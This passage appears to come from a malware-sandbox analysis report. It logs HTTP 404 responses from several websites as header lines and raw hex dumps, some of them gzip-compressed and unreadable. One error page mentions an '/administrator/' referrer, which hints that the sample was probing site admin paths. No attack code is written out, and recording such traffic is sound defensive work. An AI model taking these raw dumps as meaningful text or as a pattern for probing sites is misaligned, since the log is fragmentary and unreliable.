65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 62 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 3e 77 65 62 6
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sun, 26 Nov 2023 05:55:02 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.2.34expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://samson.pe/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sun, 26 Nov 2023 05:59:30 GMTserver: LiteSpeedData Raw: 32 32 63 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 7d 5b 77 db 38 92 f0 b3 7d ce fc 07 84 39 b1 a5 6e de 25 f9 22 5b ea 71 d2 9e de ec a6 3b 99 38 d9 39 bb 49 4e 0e 44 42 12 12 92 60 03 a0 65 b5 5b 3f 66 1f f7 79 df f6 b5 ff d8 9e 02 78 13 4d c9 8e ed 9e ef cb 4c cb 24 50 a8 2a 14 aa 0a f7 e2 e9 93 90 05 72 99 12 34 97 71 34 de 3d 85 3f 28 c2 c9 6c 64 10 61 bd 39 37 20 8d e0 70 bc bb 73 1a 13 89 51 30 c7 5c 10 39 32 de bf fb 9b 75 64 94 e9 09 8e c9 c8 b8 a4 64 91 32 2e 0d 14 b0 44 92 44 8e 8c 05 0d e5 7c 14 92 4b 1a 10 4b bd 98 88 26 54 52 1c 59 22 c0 11 19 79 0a 4b 44 93 af 88 93 68 64 a4 9c 4d 69 44 0c 34 e7 64 3a 32 e6 52 a6 62 e8 38 b3 38 9d d9 8c cf 9c ab 69 e2 78 50 a8 e0 49 d1 de e7 6c c2 a4 d8 2f 29 ef 27 8c 26 21 b9 32 d1 94 45 11 5b ec 23 47 15 79 62 59 e8 dd 9c 0a 24 a8 24 88 0a c4 52 49 63 fa 1b 09 d1 82 ca 39 92 73 82 fe 83 61 21 d1 c5 f9 6b 94 46 d9 8c 26 e8 d2 f7 ec 01 b2 50 c1 cc 12 00 ec 80 c5 ce 82 f1 30 e5 44 08 47 83 0a 47 10 e6 20 cb 02 d1 48 2a 23 32 7e f3 c7 7f cd 68 82 51 c2 10 49 40 30 1c 87 18 59 e8 02 c7 82 25 e8 05 a4 b0 48 a0 37 84 ff f1 bf a7 8e 2e 54 54 2e e5 2c 25 5c 2e 47 06 9b 0d 23 06 12 ab 49 97 88 cf e7 17 06 d4 2c 6f 9f 35 70 85 a9 06 fd 4d 8c 6c c4 0a 72 fb 0c 32 af 61 6e ad 4a 8e 41 04 9c a6 12 81 9a 8d 0c 9c a6 11 0d b0 a4 2c 71 a2 f0 fb 2f 82 25 06 0a 22 2c c4 c8 50 42 b5 44 30 27 31 b6 66 1c a7 73 63 7c 6d fc 55 a9 d2 95 34 86 a5 2a 68 10 50 06 c3 34 fe aa 21 87 1f ae 8d bf 02 0d 63 68 fc 83 4c 2e a8 24 90 49 c3 7a 39 25 70 3b 25 ce d3 05 99 40 3d 0c d3 c8 78 d4 0a 62 98 86 aa e4 d0 68 af 9c 69 84 44 57 8d b2 c4 18 1a 86 69 a4 d9 24 a2 62 4e b8 31 bc de 4c 9a f1 19 4e e8 6f 4a 06 c6 ca 34 52 06 96 42 71 74 16 80 58 8c 7a 4d 2e 08 e6 c1 3c cf 30 0d 89 f9 8c 48 85 3d af ea 79 22 f9 f2 0d a3 89 d4 55 79 47 e2 34 c2 12 a4 50 e8 aa 28 6b fd 83 18 5d 0b 85 f1 b3 24 3c fe 2c 24 a7 c9 6c 05 4c fc 9a 11 be b4 68 92 66 20 68 4e 7e cd 28 27 21 52 a6 75 b3 88 b1 fa 64 1a 34 79 85 93 59 86 67 40 4c 7b 8b 95 59 35 c2 eb 7a 35 b7 b4 c4 9a 38 6e 95 f9 96 d6 8a d8 8c d5 45 f3 32 c6 33 f2 7a f2 85 04 20 9b 16 6e b7 30 e5 68 15 73 00 a7 43 01 91 b3 45 55 16 a9 95 fb 3b 27 4b 23 86 43 e1 f8 ae ef 3b ee 81 42 60 15 2d 90 80 be e6 90 ef 37 a8 dd 37 e1 52 fe d4 18 1e bb a6 31 27 74 36 97 fa 39 c0 a9 d6 a4 0d aa bb 32 0d 55 a7 ad 6a da 26 82 95 69 08 1c 93 33 61 0c 3f 94 fa b5 58 2c ec 25 cb 64 36 21 ca 23 66 82 70 e7 e2 ec e7 8b d7 bf fc f4 f6 f5 fb 37 c6 a7 d5 a7 d5 a9 a3 6d 05 1c 15 78 60 e7 86 8f b5 95 cf dc dd 3d 2d 7b 82 fd 30 11 56 ca c9 94 c8 60 be af bb 83 7d c7 01 7a 33 c6 66 11 91
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:30 GMTServer: ApacheLast-Modified: Thu, 24 Oct 2019 19:33:13 GMTETag: "1e8-595ad1aad5040"Accept-Ranges: bytesContent-Length: 488Content-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 41 72 69 61 6c 22 20 73 69 7a 65 3d 22 33 22 3e 45 72 72 6f 20 34 30 34 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 4d 53 20 53 61 6e 73 20 53 65 72 69 66 22 20 73 69 7a 65 3d 22 32 22 3e 50 e1 67 69 6e 61 20 6e e3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:30 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-127.ec2.internalX-Request-Id: 515e9e4a-fd29-4be9-b345-83d3b1b5d0c0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.4.33content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://hmichaelandco.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sun, 26 Nov 2023 05:59:30 GMTserver: LiteSpeedData Raw: 32 66 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 e3 36 b2 e8 67 b9 ea fc 07 0c 9d 58 d2 2c 49 51 2f 3f 64 cb 39 93 d9 64 93 53 c9 26 37 93 9c ad 5b 93 39 2a 88 84 24 cc 50 04 97 80 64 7b 3d fe 41 f7 6f dc 5f 76 ab f1 20 41 8a 7a f8 91 9c f3 e1 2a 95 31 09 02 dd 8d 46 a3 d1 00 ba 81 ab 57 11 0b c5 5d 4a d0 42 2c e3 eb a3 2b f8 83 62 9c cc c7 0e 49 bc df de 39 47 8d 34 23 33 7a 3b 76 d8 7c 84 16 42 a4 7c d4 e9 b0 79 ea 2f 49 27 e1 c7 0e 82 52 04 47 d7 47 57 4b 22 b0 cc e2 91 7f ae e8 7a ec bc 65 89 20 89 f0 7e bd 4b 89 83 42 f5 36 76 04 b9 15 1d c0 74 89 c2 05 ce 38 11 e3 df 7e fd d6 3b 77 50 e7 fa e8 e8 ea 95 e7 a1 1f d9 94 c6 04 bd 4b 49 48 67 34 44 3f 12 81 39 3a 41 df e2 35 0d 59 c2 91 e7 19 84 09 5e 92 b1 b3 a6 e4 26 65 99 b0 d0 dc d0 48 2c c6 11 59 d3 90 78 f2 c5 45 34 a1 82 e2 d8 e3 21 8e c9 b8 eb a2 25 be a5 cb d5 b2 48 58 71 92 c9 37 3c 8d c9 38 70 ae af 62 9a 7c 42 19 89 c7 0e 5f b0 4c 84 2b 81 80 06 07 2d 32 32 1b 3b c0 93 51 a7 b3 58 d2 70 81 49 8c 93 28 64 7e c8 96 9d 9b d4 d3 55 ee ac d2 98 e1 88 77 7a 41 2f e8 04 a7 79 66 3f 4d e6 25 0c 38 4d 63 e2 09 b6 0a 17 de 9f 88 84 d3 7f 11 3e 76 ba bd e0 b6 db 0b fe a4 9a 69 a4 67 a7 b7 67 a7 7f 2e ca ee b0 77 db 1d f6 5e 10 29 c8 ec 3f 58 16 fd 9c 11 ce d1 3b b1 9a cd a4 88 a2 2d bf 2b 1e 66 34 15 d7 47 5b be cb e4 ce 6b f4 bf d9 0a 85 38 41 38 8a d0 92 65 04 3a d1 8c ce 57 19 16 94 25 88 a5 f0 87 23 c1 d0 0d 99 ce 58 22 40 ce 48 86 a6 77 28 cd c8 9a b2 15 8f ef 50 44 66 34 a1 c9 1c 89 05 41 ff 20 d3 6f 59 22 de 4a 40 e8 86 8a 05 ba 63 ab 2c 87 f5 ba b3 93 28 3a 43 2d 04 2a 83 cd 2a a0 c6 e3 31 72 56 89 44 46 22 07 b5 d1 fd 4e 48 50 c7 32 31 63 94 90 1b f4 d3 f4 23 09 45 ab 7d b9 b3 f4 c3 ce af 25 b8 ef 9b 73 c6 e6 31 69 7e 40 63 74 3f c3 4b 1a 53 c2 47 e8 7d f3 47 96 08 4e b2 0c 8b 51 37 08 dc 5e 10 b8 fd 20 70 07 41 e0 0e 83 c0 3d 0d 02 f7 2c 08 dc f3 20 70 2f 82 c0 ed 06 01 15 38 a6 21 e4 d4 4f fd fc 69 90 3f 0d f3 a7 d3 fc e9 2c 7f 3a cf 9f 2e cc 53 d3 45 cd 9f 52 92 fc e5 1d 4e f8 c8 90 60 a3 af 43 b3 13 f8 09 5f 4d 41 b3 c6 58 d0 a4 f9 e1 e1 f2 68 27 c3 5a b3 55 12 82 30 b5 0e 69 b6 35 ce d0 cd 0c 8d 51 c4 c2 d5 92 24 c2 0f 33 82 05 f9 26 26 f0 d6 42 4d 25 df 4d b4 a7 15 41 06 6e 66 3e cf 42 34 46 4d 33 bc e0 8f f8 d6 57 6d 86 53 ca a5 36 85 b4 4e 4c a7 bc a3 25 bd d3 f5 87 7e df bc f9 1f 79 73 b7 c0 68 54 72 b4 1b a3 a6 1c 84 3e e2 35 d6 94 1e 54 18 f3 bb 44 52 2a b2 15 39 00 1f f0 89 db 6c 9a 13 a1 79 c4 bf be fb 15 cf ff 8e 97 c4 e6 d6 fb e0 c3 7e 42 b8 9f e2 8c 24 e2 ef 2c 22 3e 4d 38 c9 c4 d7 64 c6 32 d2 42 37 33 Data Ascii: 2f
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:30 GMTServer: ApacheAccept-Ranges: bytesVary: Accept-EncodingCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Content-Length: 1699Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:31 GMTServer: ApacheVary: accept-language,accept-charset,User-AgentAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 33 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 32 33 0d 0a 0a 0a 20 20 20 20 54 68 65 20 6c 69 6e 6b 20 6f 6e 20 74 68 65 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 0d 0a 38 64 0d 0a 68 74 74 70 3a 2f 2f 63 6f 72 61 6c 70 61 72 6b 63 68 72 69 73 74 69 61 6e 2e 6f 72 67 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 72 65 66 65 72 72 69 6e 67 0a 20 20 20 20 70 61 67 65 3c 2f 61 3e 20 73 65 65 6d 73 20 74 6f 20 62 65 20 77 72 6f 6e 67 20 6f 72 20 6f 75 74 64 61 74 65 64 2e 20 50 6c 65 61 73 65 20 69 6e 66 6f 72 6d 20 74 68 65 20 61 75 74 68 6f 72 20 6f 66 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 0d 0a 35 34 0d 0a 68 74 74 70 3a 2f 2f 63 6f 72 61 6c 70 61 72 6b 63 68 72 69 73 74 69 61 6e 2e 6f 72 67 2f 61 64 6d 69 6e 6
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Sun, 26 Nov 2023 05:59:31 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 